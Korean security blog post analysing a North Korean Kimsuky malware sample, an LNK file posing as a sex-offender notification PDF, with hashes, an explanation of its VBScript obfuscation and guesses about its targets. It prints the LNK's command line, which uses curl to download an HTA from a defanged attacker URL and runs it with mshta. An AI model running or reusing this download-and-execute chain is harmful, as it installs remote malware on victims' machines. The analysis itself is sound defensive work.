오늘도 정말로 존경하지 않는 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 성범죄자 신상정보 고지.pdf.lnk(2025.3.25) 에 대해 알아보겠습니다.
파일명:성범죄자 신상정보 고지.pdf.lnk
사이즈:1 MB
MD5:1d64508b384e928046887dd9cb32c2ac
SHA-1:23cf29e451394d1824046335b2c85eaa2b6e4d0b
SHA-256:a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189
악성코드에 포함된 내용
StringData
{
namestring: not present
relativepath: not present
workingdir: not present
commandlinearguments: /c cd /d %temp% && curl -O hxxps://cdn(.)glitch(.)global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw(.)hta?v=2 && mshta %temp%\sfmw(.)hta
iconlocation: %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
}
local_base_path: C:\Windows\System32\cmd.exe악성코드 분석
cmd.exe /c는 뒤에 오는 명령어들을 한 줄로 실행하고 종료하는 명령어
/c는 주어진 명령어를 실행하고 cmd.exe 가 종료
cd /d %temp%
/d 옵션은 드라이브가 달라도 이동 가능하게 합니다.
%temp% 는 사용자 계정의 임시 폴더 (C:\Users\<username>\AppData\Local\Temp)
해당 디렉터리는 권한 없이도 파일 생성 가능->악성코드가 가장 자주 사용하는 폴더
curl -O hxxps://.../sfmw(.)hta?v=2
curl은 HTTP 요청을 통해 원격 서버로부터 파일을 다운로드
-O 옵션은 URL의 파일명을 그대로 저장
sfmw.hta?v=2->로컬 저장 명은 그냥 sfmw.hta
mshta %temp%\sfmw.hta
mshta.exe:Windows 기본 포함 실행파일
.hta 파일을 실행시켜 HTML/JS/VBS코드 실행
iconlocation:마이크로소프트 엣지 아이콘 사용
사용자에게 정상적인 마이크로소프트 프로그램처럼 보이도록 위장
sfmw.hta 는 VBScript 기반으로 작성된 악성 HTML
HTA(HTML Application)는 Windows에서 기본적으로 실행 가능한 형식으로 공격자가 스크립트 기반 악성 행위를 수행하기에 매우 적합한 포맷
파일 기본 정보
파일명:sfmw.hta
유형:HTML Application (.hta)
스크립트: VBScript |
주요 기능: 명령 실행 (Run),COM 객체 생성 (WScript.Shell) |
| 분석 방식 | 정적 분석, 난독화 해제 시도 |
HTA는 <script language="VBScript"> 블록으로 시작되며 핵심 악성 로직은 모두 여기에 포함.
스크립트는 chr(...) 함수를 이용해 문자열을 하나하나 조합하는 방식으로 사람 짜증 나게 설계돼 있음
ss 라는 변수를 반복적으로 덧붙여 완성된 문자열을 만들고 해당 문자열을 CreateObject() 함수에 전달하여 COM 객체를 생성
난독화 방식 분석
함수 조합: chr(...) 안의 수식을 다양한 정수 연산으로 구성해 사람이 보기 어렵게 만듦
진법 혼용: 10진수와 16진수를 섞어 가독성을 떨어뜨림
에러 유도: 일부 chr() 수식은 의도적으로 잘못 구성되어 정적 분석 도구에서 오류 발생 유도
실행 환경 의존:CLng(...)은 VBScript 런타임에서만 동작 파이썬 등에서는 오류 유도
예상 실행 흐름
ss 변수에 WScript.Shell 문자열을 난독화된 방식
Set oShell = CreateObject(ss)->COM 객체 생성
oShell.Run "…."->외부 명령어 실행
PowerShell 인코딩 페이로드 실행
악성 기능 요약
주요 API:CreateObject("WScript.Shell"),.Run
난독화 수단:chr() + 수식 조합 (고전 VBScript 난독화)
분석 방해 기법:수식 오류 삽입, 실행 시점 해석 의존
프로세스 생성:wscript.exe,powershell.exe,cmd.exe
일단 해당 악성코드는 신기하게 성범죄자 신상정보 고지를 통해서 악성코드 유포를 한 것이 신기한 것 같고 그리고 성범죄자 신상정보 고지이며 법 관련 다루는 사람이나 아동 청소년 관련이며 학부모, 여성분들을 대상으로 할 것 같기도 하고 PDF 파일을 보면 성범죄자 신상정보 고지 양식이니까? 아마도 여성 가족부 관련해서 업무에 종사하시는 분들에게 대상으로 한 것이 아닐까? 아니면 관계자가 해킹되었을 수도…. 이것은 수사하시는 분들이 해야 하는 것 같습니다. 이것은 어디를 대상으로 공격했는지 확인하기 어려운 것 같습니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 북한 해킹 단체 APT37(Reaper)에서 만든 악성코드-한국군사학논총(2025.3.26) (0) | 2025.03.31 |
|---|---|
| 캡챠 복사 붙여넣기 기법 을 악용을 하는 클릭픽스(ClickFix)-blessdayservices(.)org/up(2025.3.24) (0) | 2025.03.28 |
| 포스코 사칭 피싱 사이트-caller(.)3utilities(.)com(2025.3.24) (0) | 2025.03.27 |
| 북한 해킹 단체 김수키(Kimsuky)에서 만든 저작권 사칭 관련 악성코드-저작권관련내역.url(2025.3.21) (0) | 2025.03.25 |
| 2017년 이후 11개 국가 북한 해킹 그룹등 새로운 Windows 제로데이를 악용 (0) | 2025.03.20 |
| 북한 김수키(Kimsuky)에서 만든 악성 백도어 VBS 스크립트-vbs.html(2025.3.16) (0) | 2025.03.19 |
| 김수키(Kimsuky) 에서 만든 파워셀 악성코드-1.ps1(<-가칭 2025.3.13) (0) | 2025.03.17 |
| 북한 해킹 그룹 Konni(코니)에서 만든 사이버범죄 신고시스템 사칭 악성코드-ECRM.hwp.lnk(2025.3.11) (0) | 2025.03.14 |
